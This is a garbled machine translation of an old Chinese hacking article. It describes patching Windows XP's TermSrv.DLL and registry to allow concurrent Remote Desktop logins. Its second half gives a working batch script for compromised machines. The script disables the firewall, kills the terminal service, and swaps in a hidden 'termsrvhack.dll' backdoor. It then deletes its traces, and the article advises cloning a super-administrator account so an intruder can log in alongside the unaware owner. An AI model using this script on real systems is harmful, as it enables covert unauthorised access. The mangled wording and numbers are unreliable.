Windows XP 3 3 8 9(terminals)multi-user login-bug warning-the black bar safety net

ID MYHACK58:62200613181
Type myhack58
Reporter 佚名
Modified 2006-12-07T00:00:00


The first step:the first is on Windows XP SP2 installed the official version, according to the conventional manner of mounting can be, not repeat them here.

Second step:prepare an earlier version of the SP2 terminal server software(it is said that from Build 2 0 8 2 start the function is disabled, so it is best to use the previous version), Chinese SP2 beta are harder to find, I use the English version Build 2 0 5 5, run after not found any problems. You can from the http://www. msfn. org/board/index. php? s=85a71ca2987c89886c99733154ae685f&act=Attach&type=post&id=1 6 1 5 1 3 Download Build 2 0 5 5 的 终端 服务器 执行 文件 TermSrv.DLL the. From this link download to is a extension. DL_ file, you can put it in the extension changed to ZIP files, then use WinRAR to unlock it.

Step three:next, start in Safe mode Windows XP, if there are multipleoperating system, you can start another can access the Windows XP system partition of the system(unless you install a third-party tool software, otherwise Windows 9 8 can not access the NTFS partition, so Windows 9 8 may be useless) to. Then, the Windows XP inside SP2 official version of all TermSrv. DLL backup, in all TermSrv. DLL file appears, with the Build 2 0 5 5 version of the TermSrv. DLL cover. Typically, the TermSrv. DLL appears at least in two positions, respectively is:\Windows\system32, and\Windows\system32\dllcache。 All original with TermSrv. DLL place, with Build 2 0 5 5 version of the TermSrv. DLL cover.

Fourth step:in the normal mode start Windows XP if the system file protection feature tips that TermSrv. DLL file has been modified and asks whether you want to recover, select No.

The fifth step:finally, modify the registry to increase the terminal server multi-user license. Given that modifying the registry is cumbersome and error-prone, you can use the following Batch command to modify the registry:

@echo off setlocal set regkey="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" reg add %regkey% /v EnableConcurrentSessions /T REG_DWORD /D 1 /f endlocal

The above content is saved as a Batch command file, such as AA. BAT, double click to execute it.

I do not recommend this practice, too trouble locking out, but also to let the system re-starting. We can write a batch file so that the system without re-starting the realization of the XP multi-user login, first of all, we first to find a registry operation command parameters:

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName [\\Machine\]FullKey Machine remote machine name - ignores the default to the current machine. On the remote machine Only HKLM and HKU are. FullKey ROOTKEY\SubKey ROOTKEY [ HKLM | HKCU | HKCR | HKU | HAVE BEEN ] SubKey of the selected ROOTKEY registry entry of the complete name.

/v the option below to add a value name.

/ve is the registry key to add an empty value name(default).

/t RegKey data types [ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ | REG_DWORD | REG_BINARY | REG_NONE ] If ignored, then the use of REG_SZ.

/s specify one in the REG_MULTI_SZ data string used as a separator character If ignored, then the "\0" is used as a delimiter.

/d to be allocated to add to the registry ValueName data.

/f without a prompt will forcibly overwrite an existing registry entry.

For example:

REG ADD \\ABC\HKLM\Software\MyCo Add the remote machine ABC on a registry key HKLM\Software\MyCo

REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead Adds a value(name: Data, type: REG_BINARY, data: fe340ead)

REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail Adds a value(name: MRU, type: REG_MUTLI_SZ, Data: fax\0mail\0\0)

REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^% Adds a value(name: Path, type: REG_EXPAND_SZ, data: %systemroot%) Note: in expansion of a string use the caret ( ^ )

In order to make the system not re-starting, we can use shutdown-a this command. According to the above looking for to the information, we can write a batch, to achieve the XP system multi-user login and not re-starting the system. The code is as follows:

@echo off @net stop sharedaccess @ntsd-c q-p "pid" @reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f @reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 0 0 0 0 0 0 0 /f @reg add HKLM\SYSTEM\CurrentControlSet\control\terminal" "server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 0 0 0 0 0 0 0 1 /f @reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\termsrvhack.dll /f @copy c:\termsrvhack.dll c:\windows\system32\dllcache\termsrvhack.dll @attrib +h +s +r c:\windows\system32\dllcache\termsrvhack.dll @copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll @attrib +h +s +r c:\windows\system32\termsrvhack.dll @shutdown-a @del c:\termsrvhack.dll @net start termservice @del c:\3389.bat

Where“pid"is to be replaced by the TermService service PID number,you can use the command tasklist/svc command to get. Of course win2000 and the following system is no tasklist command. The specific operation method is First to get to the other side of one SHELL,then the shell with third-party software to open the Terminal Service,do not change the default 3 3 8 9 port,or to re-starting only after the landing,to build another or clone a super administrator user. Next the download good termsrvhack. dll and the above batch transmission to the other C drive under the root directory,and then in the shell run under this batch. The prompt success! The last open landing,3 3 8 9 terminal landing! Explain you landing it on the inside of the operation and that computer,the owner of the operation is not affect each other, he playing with his,you play with your,huh,cool rosuvastatin?!